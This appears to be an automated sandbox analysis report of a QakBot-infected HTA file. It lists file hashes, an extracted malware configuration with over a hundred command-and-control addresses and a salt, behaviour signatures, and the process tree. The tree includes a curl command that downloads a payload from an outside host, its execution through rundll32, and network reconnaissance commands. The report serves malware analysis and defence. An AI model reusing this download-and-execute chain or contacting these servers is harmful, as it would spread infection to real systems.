Resubmissions
02/02/2023, 21:19
230202-z6jahaba9y 10 02/02/2023, 21:19
230202-z6b67aba9w 7 02/02/2023, 21:17
230202-z48sdafh78 7 02/02/2023, 20:21
230202-y5afjaae3w 10 02/02/2023, 20:20
230202-y4k6msfd36 7 02/02/2023, 20:03
230202-ysnsdsac8z 7 02/02/2023, 20:02
230202-yr9ngaac8w 7 02/02/2023, 20:01
230202-yrllmsfb54 7 02/02/2023, 19:47
230202-yhszcsab9z 7 02/02/2023, 19:46
230202-yg5lrsfa45 7

Analysis
max time kernel: 1800s
max time network: 1799s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02/02/2023, 21:19
Static task: static1
General
Target: Open.hta
Size: 3KB
MD5: 7daa66c5c04a63b630e284360740bc3f
SHA1: 13ccbcef1329ae8c204c13e757a867e31f3b62bc
SHA256: 35e319a9cd3e423081fa1d0a0c084f555b1c5fb1042189dd969d1706f6d25fe2
SHA512: c23873af1524f9d97e4f4066a64240a6339c9ebe30ed1a623c60db683b0e85189dab28976f9116a7c9a38a864b9acdc8de66fda96ea7e3e58b46217efe965744
Malware Config
Extracted
qakbot
404.432
BB12
1675352134
213.67.255.57:2222
86.96.72.139:2222
119.82.122.226:443
86.96.34.182:2222
12.172.173.82:50001
107.146.12.26:2222
97.116.78.96:443
47.61.70.188:2078
197.148.17.17:2078
82.127.204.82:2222
82.121.195.187:2222
73.155.10.79:443
91.231.173.199:995
86.196.12.21:2222
90.78.51.182:2222
90.165.109.4:2222
202.186.177.88:443
92.27.86.48:2222
88.171.156.150:50000
78.130.215.67:443
70.66.199.12:443
47.203.227.114:443
162.248.14.107:443
75.98.154.19:443
83.248.199.56:443
64.237.207.9:443
82.36.36.76:443
183.82.112.209:443
98.145.23.67:443
70.77.116.233:443
49.245.127.223:2222
105.99.105.0:443
209.142.97.83:995
74.33.196.114:443
75.156.125.215:995
189.222.55.8:443
70.160.80.210:443
194.166.90.227:443
12.172.173.82:20
12.172.173.82:995
91.68.227.219:443
91.170.115.68:32100
70.51.133.160:2222
90.104.22.28:2222
86.161.143.7:2222
173.76.49.61:443
24.64.112.40:2222
92.154.45.81:2222
84.219.213.130:6881
47.21.51.138:995
86.130.9.182:2222
78.16.206.181:443
217.128.91.196:2222
74.214.61.68:443
92.239.81.124:443
72.188.121.121:443
181.118.206.65:995
200.109.207.186:2222
12.172.173.82:465
86.165.225.227:2222
208.180.17.32:2222
24.64.112.40:50010
184.153.132.82:443
151.65.168.222:443
72.80.7.6:995
79.9.64.37:995
174.104.184.149:443
24.64.112.40:3389
81.151.102.224:443
108.2.111.66:995
47.34.30.133:443
50.68.204.71:993
123.3.240.16:995
103.12.133.134:2222
47.196.203.73:443
73.165.119.20:443
86.172.79.135:443
41.250.182.207:443
217.128.200.114:2222
47.6.243.7:443
156.217.208.137:995
12.172.173.82:32101
73.36.196.11:443
173.18.126.3:443
81.229.117.95:2222
190.191.35.122:443
84.35.26.14:995
37.14.229.220:2222
90.162.45.154:2222
24.71.120.191:443
86.225.214.138:2222
172.90.139.138:2222
92.207.132.174:2222
217.165.235.126:443
104.35.24.154:443
69.159.158.183:2222
24.123.211.131:443
67.61.71.201:443
86.194.156.14:2222
197.14.77.92:443
184.189.41.80:443
103.169.83.89:443
86.151.21.134:2222
23.251.92.57:2222
71.31.101.183:443
99.254.167.145:443
198.2.51.242:993
76.80.180.154:995
92.11.194.53:995
88.126.94.4:50000
121.121.100.207:995
92.154.17.149:2222
74.92.243.113:50000
68.150.18.161:443
69.119.123.159:2222
50.68.204.71:995
93.238.63.3:995
201.244.108.183:995
92.8.190.175:2222
salt: SoNuce]ugdiB3c[doMuce2s81*uXmcvP
Signatures

- Downloads MZ/PE file

- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation (process: mshta.exe)

- Loads dropped DLL (3 IoCs)
  PID 3692 rundll32.exe (3 entries)

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Discovers systems in the same network (1 TTP, 1 IoC)
  PID 664 net.exe

- Gathers network information (2 TTPs, 2 IoCs)
  Uses commandline utility to view network configuration.
  PID 1288 ipconfig.exe
  PID 4600 netstat.exe

- Kills process with taskkill (1 IoC)
  PID 3412 taskkill.exe

- Runs net.exe

- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  PID 3692 rundll32.exe (2 entries)
  PID 3964 wermgr.exe (remaining 62 entries)

- Suspicious behavior: MapViewOfSection (1 IoC)
  PID 3692 rundll32.exe

- Suspicious use of AdjustPrivilegeToken (30 IoCs)
  Token SeDebugPrivilege: PID 3412 taskkill.exe
  Token SeDebugPrivilege: PID 4600 netstat.exe
  Token SeDebugPrivilege: PID 2340 whoami.exe (27 entries)
  Token SeSecurityPrivilege: PID 3756 msiexec.exe

- Suspicious use of WriteProcessMemory (53 IoCs)
  Columns: description, pid, Process, procid_target; identical consecutive rows are collapsed with a count.
  PID 1556 wrote to memory of 1376 (mshta.exe, procid_target 83), 3 entries
  PID 1556 wrote to memory of 3692 (mshta.exe, procid_target 85), 3 entries
  PID 1556 wrote to memory of 3412 (mshta.exe, procid_target 86), 3 entries
  PID 3692 wrote to memory of 1128 (rundll32.exe, procid_target 88), 3 entries
  PID 3692 wrote to memory of 3964 (rundll32.exe, procid_target 89), 5 entries
  PID 3964 wrote to memory of 664 (wermgr.exe, procid_target 100), 3 entries
  PID 3964 wrote to memory of 1256 (wermgr.exe, procid_target 102), 3 entries
  PID 3964 wrote to memory of 1248 (wermgr.exe, procid_target 104), 3 entries
  PID 3964 wrote to memory of 1288 (wermgr.exe, procid_target 106), 3 entries
  PID 3964 wrote to memory of 3752 (wermgr.exe, procid_target 108), 3 entries
  PID 3964 wrote to memory of 3540 (wermgr.exe, procid_target 110), 3 entries
  PID 3540 wrote to memory of 436 (net.exe, procid_target 112), 3 entries
  PID 3964 wrote to memory of 2720 (wermgr.exe, procid_target 113), 3 entries
  PID 3964 wrote to memory of 4600 (wermgr.exe, procid_target 115), 3 entries
  PID 3964 wrote to memory of 3464 (wermgr.exe, procid_target 117), 3 entries
  PID 3464 wrote to memory of 3996 (net.exe, procid_target 119), 3 entries
  PID 3964 wrote to memory of 2340 (wermgr.exe, procid_target 120), 3 entries
Processes

- C:\Windows\SysWOW64\mshta.exe (PID 1556)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Open.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\curl.exe (PID 1376)
    Command line: "C:\Windows\System32\curl.exe" --output C:\ProgramData\1.png --url https://spincotech.com/8CoBExd/3.gif
  - C:\Windows\SysWOW64\rundll32.exe (PID 3692)
    Command line: "C:\Windows\System32\rundll32.exe" C:\ProgramData\1.png,Wind
    Signatures: Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\wermgr.exe (PID 1128)
      Command line: C:\Windows\SysWOW64\wermgr.exe
    - C:\Windows\SysWOW64\wermgr.exe (PID 3964)
      Command line: C:\Windows\SysWOW64\wermgr.exe
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net.exe (PID 664)
        Command line: net view
        Signatures: Discovers systems in the same network
      - C:\Windows\SysWOW64\cmd.exe (PID 1256)
        Command line: cmd /c set
      - C:\Windows\SysWOW64\arp.exe (PID 1248)
        Command line: arp -a
      - C:\Windows\SysWOW64\ipconfig.exe (PID 1288)
        Command line: ipconfig /all
        Signatures: Gathers network information
      - C:\Windows\SysWOW64\nslookup.exe (PID 3752)
        Command line: nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.WORKGROUP
      - C:\Windows\SysWOW64\net.exe (PID 3540)
        Command line: net share
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\net1.exe (PID 436)
          Command line: C:\Windows\system32\net1 share
      - C:\Windows\SysWOW64\route.exe (PID 2720)
        Command line: route print
      - C:\Windows\SysWOW64\netstat.exe (PID 4600)
        Command line: netstat -nao
        Signatures: Gathers network information; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\net.exe (PID 3464)
        Command line: net localgroup
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\net1.exe (PID 3996)
          Command line: C:\Windows\system32\net1 localgroup
      - C:\Windows\SysWOW64\whoami.exe (PID 2340)
        Command line: whoami /all
        Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\taskkill.exe (PID 3412)
    Command line: "C:\Windows\System32\taskkill.exe" /f /im mshta.exe
    Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken

- C:\Windows\system32\msiexec.exe (PID 3756)
  Command line: C:\Windows\system32\msiexec.exe /V
  Signatures: Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 526KB
  MD5: f0f24ffaff98315065fcdcdce15e97b0
  SHA1: 314170e250a6352cfb62f3e63ff6cde8f585c5cf
  SHA256: 0f671171cf7f421ff58c023b2ab55e85b2bbb38934d5189bd911668ea2d79512
  SHA512: 183673716a5d6e4d36204f0f35a6c00ceb3da9735a24765cd92b51d0af0aafddb752f33c1f99833ece27d404e4b994c162eacf02666bea2329ea504512228e5c
- Filesize: 2.1MB
  MD5: f530495445432d6ae00f2b0f08f7c804
  SHA1: f66f538b95b1a924c8392fbe7743d193d78eb50c
  SHA256: 5cc51f26704eef3b59e6d33ea690fa5c62237627269493ead5bad6f71d2de07b
  SHA512: 2b44ed622e63014a0d2d613d8bbc1548dd193460ce7711414dc4eb62a2aef69d57c9821f834555539b6a49f584cb46c5e82a9867ab0a0733d78e4f1d032d6ce8